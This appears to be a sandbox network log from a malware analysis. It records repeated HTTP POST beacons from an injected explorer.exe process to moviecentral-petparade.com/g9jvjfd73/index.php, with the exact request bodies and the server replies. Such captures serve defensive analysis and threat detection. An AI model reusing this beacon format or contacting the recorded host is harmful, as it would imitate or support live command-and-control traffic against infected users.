0	192.168.2.9	49903	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:25:34.241723061 CET	169	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 31, 2024 14:25:35.128082991 CET	776	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:25:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uRvf81GJsIUlOGvHD3YFkeS6YNB9GKrv6gh48HzSVEF12iH67bwM6dvX6Qv7ZWfou9JeFZ7BXPLr4OVG9Kyv6g%2FYuSVQIgRZmxZA4bklPA%2B4wZJQGVMHIn8U5YZ1RL11pAr6ZRxrVlzbhkFWqQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f8cc5b1f2d33-DFW server-timing: cfL4;desc="?proto=TCP&rtt=2091&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49916	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:25:36.647644997 CET	319	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Oct 31, 2024 14:25:37.559220076 CET	784	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:25:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fBsb4xM0EaywKN%2Fwfnm3mhpmEMDYvjJQDaFHGJjICAsaxI3Yh4xKgoQNc0rSISbMd%2B8nZgslaa1S0RwxFExILe6gCw7uH%2BaiXX4ef70KqoZjNCW4K5OLnr5YP5UXkjaSVSkIaK5DHYvR4Nh4kg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f8db6cd36b49-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1286&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49930	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:25:39.202775955 CET	169	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 31, 2024 14:25:40.089376926 CET	782	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:25:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YzGb%2FztY9KdQ3HFyNUMeJg4mBVxc2aAspWoPuPySGC%2FY1Nw9mR9MayOfzugQEplYt1Euo8sjBmqcdIhbvQQZ4EJ%2Fab2VUo3MfcDJx9dANYyk5m5jjMIX6C0WlZfr%2FlmWYk%2BMv5QO2o0GEiMdxA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f8eb69444641-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1167&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49946	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:25:41.597575903 CET	319	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Oct 31, 2024 14:25:42.510982037 CET	796	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:25:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QYE%2Fy8To%2Fhtw%2BbU6%2FY9iXxcbLezcBHK9%2FvlxnVkD%2BbP3Ywy3hG3icmYHsidGfBnxqMYb2n8fyCSFznSNcdVap5F3o70iIlM%2BenWdjGNkWbXglQ%2BQknNfupSn6GmgthKsDPouh45O%2B3BXPN3CHw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f8fa6a9be962-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1086&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49962	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:25:44.146783113 CET	169	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 31, 2024 14:25:45.008002996 CET	778	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:25:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=20RxoggpMSurewfgTLd4uTxVpMdestMcekLc8PtILjTcD5i71cmEgDmgsIS13CC7jG%2Ffu%2Bzrwunh0jgPbjiLS5jp3A%2FEuLxLabiqZ0w70l1pcY8zlDYmzpqEO7AL4ZBVL4Ni8l7Mz6CAO4IHFw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f90a5c1b2c89-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1177&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49975	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:25:46.521676064 CET	319	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Oct 31, 2024 14:25:47.403352022 CET	789	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:25:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EYn%2BsJvf6m2FKqyQujCZGKDgZyYv0YRogwdsPQ1QZ%2Fzoj9ms162%2BwhIZ%2BCzFMbvg%2Fk5Mgu8hoHNfIteT7%2F%2Fj46FJAvOt02TURidVCnGmxWCVxwXgCTnn7RE4BVqCGcKdl%2FhHNQmXUUubb6ISPg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f9191c624642-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1800&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a Data Ascii: 7 <c><d>
Oct 31, 2024 14:25:47.403369904 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49987	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:25:49.037106991 CET	169	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 31, 2024 14:25:49.964687109 CET	780	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:25:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dgKzCUCZPyqJFPowvreaUR1VO20DkzlSupkG3uoSD0XzCQlZCKASKIBuS6A1mODItBqDiGrTpT%2BaHCrWFx6LnqkSHGp7mel%2B6SeRUFcLl5P5WWwR9ZR74x%2FW3ZvfE0B%2FGf9lfUvPlJQ7sN5ulA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f92908cf2e1b-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1318&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49988	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:25:51.621587038 CET	319	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Oct 31, 2024 14:25:52.485980034 CET	790	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:25:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ZLb3u3jH7%2FIqYUWo1nq%2B%2BU3TVLgh8BHlvE3VUXjwYYuszknKradrAnyAR%2Bo95vG9vbU0QmmXUGLqTMEIh55K7FRF7%2FhZnAUjXFacpNQwWEex0OJ1l9OZcC20YOlhx4A%2BNnct0qnoOvD1DTlOQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f9390ba24618-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1315&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49989	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:25:54.164885044 CET	169	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 31, 2024 14:25:55.004777908 CET	780	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:25:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rx1C0W0Ok3SEPXGgnNG7igz7LRuAYSSVNra6707VGZLx%2B%2BqnSVhJA1dvBDTlNWJ3j3dDzV8IdMItw8GL0oKR5%2FiIPRReEOA4vkw1PC9Zpfo5s%2FbYnYFMePj1G6AGFEFxbJKcvaTPMSMxdgQpUQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f948db62e7c7-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1155&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49991	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:25:56.520003080 CET	319	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Oct 31, 2024 14:25:57.394423962 CET	790	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:25:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SRWMsP2c7CjRZX4f105Rbn8R5%2FXJ0ZeAFeALWF9z79z7VequDMeM6vNcX6nTMazFOVYjC%2B7KTXQvw%2FzRR%2BL6qbmAkMh9rkzix8u%2BQYxvtWnf6Cnc4WnOfjsZGsgYRVCWOpCju%2FoV5RhJF5W9rw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f9579ef0a922-DFW server-timing: cfL4;desc="?proto=TCP&rtt=2145&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49992	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:25:59.022228003 CET	169	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 31, 2024 14:25:59.922946930 CET	792	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:25:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q5lU51z%2BHSQb44k6iWKEjSC7%2B9mXVhIT0hJ2OXUZ7%2Bay0kI1gPJKdS%2FSbeXQHnMrsJea%2Bgo8l1sqXHSeFsehbHnpZ46RVS2Jb3x%2FC0XWdAWw3iWgAtnu%2F4pHAf%2B%2Badl%2FyU35UUlkXSMfkWOIDQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f9674d456c08-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1176&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	49993	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:01.442446947 CET	319	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Oct 31, 2024 14:26:02.314182997 CET	786	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BJOGU14vWgL5HuP6obsT88IOzRnz3BtTsV1nVrqtFtuIk5dweGhhqZuudDcGxzEjLBu95Jh1UB%2BKHiEvRfqY1Frso30FhzLrjAneb%2FzxDQO%2FLZtE4iaSnEEbM7w0NZAk8X4CZ6A6KV9%2FsFhaLw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f9765c5dddab-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1396&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.9	49994	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:03.954372883 CET	169	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Oct 31, 2024 14:26:04.816848993 CET	776	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RDccIHLsr4NC1IYcnP5HLU0dYQ5cR20OhlArQ8g4V4kGIWNfhnIOBEzXns9m33rA2tVgO7NnkCL5q8G%2B8TKirAhnEt80bEUGd1pZm0tXXqWwFpHJcv6EA0t22pVPB6egrbjXTUgs%2BdtHo5x0WA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f9860ed86b83-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1021&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=169&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	49995	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:06.333141088 CET	319	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 46 43 43 34 31 41 38 31 33 43 37 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 35 44 45 43 37 31 44 35 32 37 35 46 45 41 37 35 39 37 31 36 32 35 37 39 41 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665FCC41A813C7D58C48CF8B295278F7EBCB075A9634F5DEC71D5275FEA7597162579ADFBB1F71ADAAC313DA754C50BF70B85B
Oct 31, 2024 14:26:07.225070000 CET	786	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 13:26:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8GV2wBKfQujIJKyQqvXBXeAg3%2FjgppUA4ygzKu8kL%2B85EuprlxVgCqX%2BebtSCw0p5WzMf7dQYqALogkOQf6CY9sJHuQvduYCTXQ4QFQW2P%2B5XICgk6gsVhk3bwUcxEE8O8hhuiYoms2kXOS8hA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8db3f994ebe9e942-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1374&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=319&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.9	49996	172.67.213.173	80	316	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 14:26:08.850112915 CET	169	OUT	POST /g9jvjfd73/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: moviecentral-petparade.com Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
